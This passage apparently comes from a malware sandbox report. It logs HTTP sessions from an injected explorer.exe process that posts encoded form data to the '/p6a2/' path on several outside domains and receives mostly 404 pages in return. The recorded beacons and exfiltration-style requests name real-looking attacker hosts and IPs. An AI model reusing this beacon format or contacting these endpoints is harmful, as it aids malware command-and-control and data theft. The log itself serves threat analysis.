                                                                                              Dec 27, 2022 10:55:53.418627024 CET235INData Raw: 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 73 68 6f 72 74 65 6e 65 64 2e 20 43 6c 69 63 6b 20 43 6f 70 79 20 6f 72 20 43 52 54 4c 2b 43 20 74 6f 20 43 6f 70 79 20 69 74 2e 22 2c 22 73 74 61 74 73 22 3a 22 59 6f 75 20 63 61 6e 20 61 63 63 65 73
                                                                                              Data Ascii: n successfully shortened. Click Copy or CRTL+C to Copy it.","stats":"You can access the statistic page via this link","copy":"Copied to clipboard.","from":"Redirect from","to":"Redirect to","share":"Share this on","congrats":"Congratulation! Y


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              25192.168.2.449720141.8.195.12480C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:58.626185894 CET237OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.4tx.ru
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.4tx.ru
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.4tx.ru/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 69 32 4c 34 62 46 4b 62 69 61 37 51 33 66 5a 55 6a 6e 71 69 6c 37 41 49 69 32 4e 48 63 6e 64 53 6e 2d 4e 55 4b 55 62 38 52 46 76 72 51 5a 58 2d 74 55 56 6d 6d 37 62 35 59 38 79 48 47 6f 43 51 74 43 78 71 64 41 46 47 47 4d 6f 4b 59 4e 76 45 4b 65 6d 33 49 30 6b 6b 41 37 7a 36 6e 31 6d 5f 63 38 34 68 4a 66 53 61 4a 78 4e 5a 53 42 45 72 71 73 4a 69 54 31 74 75 75 6a 75 65 33 70 47 74 73 70 69 61 39 30 47 52 70 72 74 68 33 48 79 56 6c 57 42 70 46 42 53 53 7a 47 43 70 68 76 67 76 69 41 4c 7a 6b 44 74 39 50 5f 6a 68 56 61 6d 43 7a 67 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=i2L4bFKbia7Q3fZUjnqil7AIi2NHcndSn-NUKUb8RFvrQZX-tUVmm7b5Y8yHGoCQtCxqdAFGGMoKYNvEKem3I0kkA7z6n1m_c84hJfSaJxNZSBErqsJiT1tuujue3pGtspia90GRprth3HyVlWBpFBSSzGCphvgviALzkDt9P_jhVamCzg).
                                                                                              Dec 27, 2022 10:55:58.683485031 CET237INHTTP/1.1 404 Not Found
                                                                                              Server: openresty
                                                                                              Date: Tue, 27 Dec 2022 09:55:58 GMT
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Content-Length: 269
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 36 61 32 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 34 74 78 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /p6a2/ was not found on this server.</p><hr><address>Apache/2.4.6 Server at www.4tx.ru Port 80</address></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              26192.168.2.449721141.8.195.12480C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:56:01.215430021 CET238OUTGET /p6a2/?PJsOe=v0jYY1ytl5PH6OIBhUa985ktrnV9EUxQvf0paGzXVH/pO6il62dTlsncR7GNVbW/vhBZVRhGCtJzQ8DjGp6vLGYCApLjgmmFaA==&4u=XXw8ZRfd0 HTTP/1.1
                                                                                              Host: www.4tx.ru
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:56:01.280149937 CET238INHTTP/1.1 404 Not Found
                                                                                              Server: openresty
                                                                                              Date: Tue, 27 Dec 2022 09:56:01 GMT
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Content-Length: 269
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 36 61 32 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 34 74 78 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /p6a2/ was not found on this server.</p><hr><address>Apache/2.4.6 Server at www.4tx.ru Port 80</address></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              27192.168.2.44972488.99.217.19780C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:56:17.544130087 CET240OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.glb-mobility.com
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.glb-mobility.com
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.glb-mobility.com/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 79 5f 62 42 62 4b 45 37 33 4e 50 35 38 6a 39 6f 4d 55 45 47 49 42 6c 6e 49 67 71 74 61 4a 59 57 41 32 65 5a 54 51 54 78 61 70 72 4d 48 2d 55 36 72 46 59 56 73 37 30 2d 73 51 6f 30 59 59 79 72 34 52 55 4a 79 37 35 4b 62 36 51 5f 7e 66 78 53 42 46 4f 34 51 49 46 31 43 79 57 4e 55 64 6a 36 64 58 61 71 59 41 39 4d 75 30 30 68 67 50 79 6a 28 7a 71 31 78 70 32 64 6c 42 44 36 78 4b 73 67 70 4f 37 44 42 7a 79 44 37 36 34 58 6d 73 33 58 43 53 4f 54 76 38 66 6f 77 78 61 4f 63 66 36 31 43 42 71 58 37 57 52 6f 35 57 62 6b 62 6f 4d 66 71 41 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=y_bBbKE73NP58j9oMUEGIBlnIgqtaJYWA2eZTQTxaprMH-U6rFYVs70-sQo0YYyr4RUJy75Kb6Q_~fxSBFO4QIF1CyWNUdj6dXaqYA9Mu00hgPyj(zq1xp2dlBD6xKsgpO7DBzyD764Xms3XCSOTv8fowxaOcf61CBqX7WRo5WbkboMfqA).
                                                                                              Dec 27, 2022 10:56:17.571763992 CET241INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 27 Dec 2022 09:56:17 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 315
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              28192.168.2.44972588.99.217.19780C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:56:20.099251986 CET241OUTGET /p6a2/?PJsOe=/9zhY/Qa6PbuzUJJeFENEisDBASeGLQuA2DsbQL1c4XMJeUN1UEfvc0JnTkLGaGl6hcCibpmZrBf1fZuQl6EVbtQGhHUTPfVDw==&4u=XXw8ZRfd0 HTTP/1.1
                                                                                              Host: www.glb-mobility.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:56:20.126142979 CET242INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 27 Dec 2022 09:56:20 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 315
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              29192.168.2.44972635.213.254.23280C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:56:26.421293974 CET242OUTGET /p6a2/?4u=XXw8ZRfd0&PJsOe=pjY5HSUHAkIjJTnjTuXZqIQD+upstRzJTGdDpMtHb2G7EDTOYPy+SC0sAwePybO7Bg4lDq58C8rolUandfOM6VH00Jlr+bNPuQ== HTTP/1.1
                                                                                              Host: www.adelaidesociety.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:56:26.692565918 CET244INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:56:26 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              X-Httpd-Modphp: 1
                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                              X-Proxy-Cache: HIT
                                                                                              Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67
                                                                                              Data Ascii: 8000<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex" /> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { position: relative; } .background-wrap.cloud-blue { background-color: #b0e0e9; } .backg
                                                                                              Dec 27, 2022 10:56:26.692645073 CET245INData Raw: 72 6f 75 6e 64 2d 77 72 61 70 2e 77 68 69 74 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 7d 0a 20 20 20 20 2e 74 69 74 6c 65 20 7b 20 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74
                                                                                              Data Ascii: round-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20px auto 10px; } .title--regular { font-family: 'Roboto', Arial, sans-serif; } .title--size-large
                                                                                              Dec 27, 2022 10:56:26.692717075 CET246INData Raw: 2d 2d 63 69 72 63 6c 65 20 7b 20 6c 65 66 74 3a 20 30 3b 20 7d 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20
                                                                                              Data Ascii: --circle { left: 0; } }</style></head><body> <div id="container"> <section class="error content background-wrap cloud-blue"> <div class="fit-wide"> <div class="error--bg__cover">
                                                                                              Dec 27, 2022 10:56:26.692790031 CET248INData Raw: 4d 32 39 32 2e 34 31 36 2c 32 35 34 2e 33 31 32 61 31 2e 30 31 33 2c 31 2e 30 31 33 2c 30 2c 30 2c 31 2d 2e 34 31 37 2d 2e 30 39 4c 32 36 36 2e 36 33 34 2c 32 34 32 2e 36 61 31 2c 31 2c 30 2c 30 2c 31 2d 2e 31 39 31 2d 31 2e 37 4c 32 38 37 2e 32
                                                                                              Data Ascii: M292.416,254.312a1.013,1.013,0,0,1-.417-.09L266.634,242.6a1,1,0,0,1-.191-1.7L287.2,225a1,1,0,0,1,1.594.629l4.607,27.516a1,1,0,0,1-.986,1.165Zm-23.437-12.835,22.139,10.141L287.1,227.6Z" fill="#226d7a"/><path d="M773.316,228.33a1,1,0,0,1-1-1.022
                                                                                              Dec 27, 2022 10:56:26.692935944 CET249INData Raw: 2e 37 2d 2e 32 38 32 6c 36 2e 34 36 31 2d 36 2e 32 36 36 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 33 39 33 2d 31 2e 34 33 36 6c 2d 36 2e 34 36 31 2c 36 2e 32 36 36 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 37 2c 31 2e 37 31 38 5a 22 20 66 69 6c 6c 3d 22
                                                                                              Data Ascii: .7-.282l6.461-6.266a1,1,0,0,0-1.393-1.436l-6.461,6.266a1,1,0,0,0,.7,1.718Z" fill="#226d7a"/><path d="M19.257,291.006a1,1,0,0,0,.964-1.269L17.8,281.069a1,1,0,0,0-1.927.537l2.419,8.668A1,1,0,0,0,19.257,291.006Z" fill="#226d7a"/><path d="M13.216,
                                                                                              Dec 27, 2022 10:56:26.692996979 CET250INData Raw: 3d 22 4d 31 34 37 2c 31 38 34 63 2d 2e 31 38 32 2c 30 2d 2e 33 36 31 2e 30 31 34 2d 2e 35 34 2e 30 32 37 6c 2d 32 2e 33 2d 37 2e 37 38 36 61 31 2c 31 2c 30 2c 31 2c 30 2d 31 2e 39 31 38 2e 35 36 37 6c 32 2e 32 36 33 2c 37 2e 36 36 61 36 2e 39 37
                                                                                              Data Ascii: ="M147,184c-.182,0-.361.014-.54.027l-2.3-7.786a1,1,0,1,0-1.918.567l2.263,7.66a6.977,6.977,0,0,0-2.643,11.269l-5.845,6.028a1,1,0,1,0,1.436,1.392L143.419,197A7,7,0,1,0,147,184Zm0,12a4.995,4.995,0,0,1-1.121-9.863,1.033,1.033,0,0,0,.155-.022c.015,
                                                                                              Dec 27, 2022 10:56:26.693044901 CET252INData Raw: 2c 2e 34 33 35 2d 31 2e 39 5a 4d 38 39 31 2c 31 37 39 61 35 2c 35 2c 30 2c 31 2c 31 2c 35 2d 35 41 35 2e 30 30 36 2c 35 2e 30 30 36 2c 30 2c 30 2c 31 2c 38 39 31 2c 31 37 39 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68
                                                                                              Data Ascii: ,.435-1.9ZM891,179a5,5,0,1,1,5-5A5.006,5.006,0,0,1,891,179Z" fill="#226d7a"/><path d="M956.292,179.469a6.477,6.477,0,0,0,9.659-.268l6.739,4.9a1,1,0,1,0,1.176-1.617L967,177.492a6.5,6.5,0,1,0-11.811.4,1.064,1.064,0,0,0-.121.039l-7.852,4.4a1,1,0,
                                                                                              Dec 27, 2022 10:56:26.693090916 CET253INData Raw: 41 35 2e 30 30 36 2c 35 2e 30 30 36 2c 30 2c 30 2c 31 2c 39 32 31 2c 31 39 34 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 34 31 2c 32 31 32 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 36 2c 31 2e 32 6c 35
                                                                                              Data Ascii: A5.006,5.006,0,0,1,921,194Z" fill="#226d7a"/><path d="M941,212a1,1,0,0,0-1.6,1.2l5.4,7.2a1,1,0,1,0,1.6-1.2Z" fill="#226d7a"/><path d="M876.837,80.654l-1.7,7.937a1,1,0,0,0,.767,1.187,1.029,1.029,0,0,0,.211.022,1,1,0,0,0,.977-.79l1.718-8.02c.064
                                                                                              Dec 27, 2022 10:56:26.693140984 CET254INData Raw: 2d 38 61 31 2c 31 2c 30 2c 30 2c 30 2c 30 2c 32 68 38 76 38 61 31 2c 31 2c 30 2c 30 2c 30 2c 32 2c 30 76 2d 38 68 38 61 31 2c 31 2c 30 2c 30 2c 30 2c 30 2d 32 5a 22 20 66 69 6c 6c 3d 22 23 32 30 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d
                                                                                              Data Ascii: -8a1,1,0,0,0,0,2h8v8a1,1,0,0,0,2,0v-8h8a1,1,0,0,0,0-2Z" fill="#206d7a"/><path d="M800,9h-8V1a1,1,0,0,0-2,0V9h-8a1,1,0,0,0,0,2h8v8a1,1,0,0,0,2,0V11h8a1,1,0,0,0,0-2Z" fill="#206d7a"/></svg> </div> <div>
                                                                                              Dec 27, 2022 10:56:26.693187952 CET256INData Raw: 35 36 2e 30 31 35 20 31 31 30 2e 32 33 35 20 31 35 37 2e 38 35 34 20 31 30 38 2e 31 32 32 20 31 35 36 2e 30 31 35 20 31 30 36 2e 30 30 38 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 35 36 2e
                                                                                              Data Ascii: 56.015 110.235 157.854 108.122 156.015 106.008" fill="#fff"/><polygon points="156.015 94.202 154.177 96.316 156.015 98.429 157.854 96.316 156.015 94.202" fill="#fff"/><polygon points="156.015 82.396 154.177 84.51 156.015 86.624 157.854 84.51 1
                                                                                              Dec 27, 2022 10:56:26.958898067 CET257INData Raw: 35 31 20 31 37 36 2e 35 36 33 20 38 36 2e 36 32 34 20 31 37 38 2e 34 30 31 20 38 34 2e 35 31 20 31 37 36 2e 35 36 33 20 38 32 2e 33 39 36 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 38 36 2e
                                                                                              Data Ascii: 51 176.563 86.624 178.401 84.51 176.563 82.396" fill="#fff"/><polygon points="186.835 129.621 184.997 131.734 186.835 133.848 188.674 131.734 186.835 129.621" fill="#fff"/><polygon points="186.835 117.814 184.997 119.928 186.835 122.041 188.67


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              3192.168.2.44969835.77.200.3380C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:25.863703012 CET183OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.loaddown.vip
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.loaddown.vip
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.loaddown.vip/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
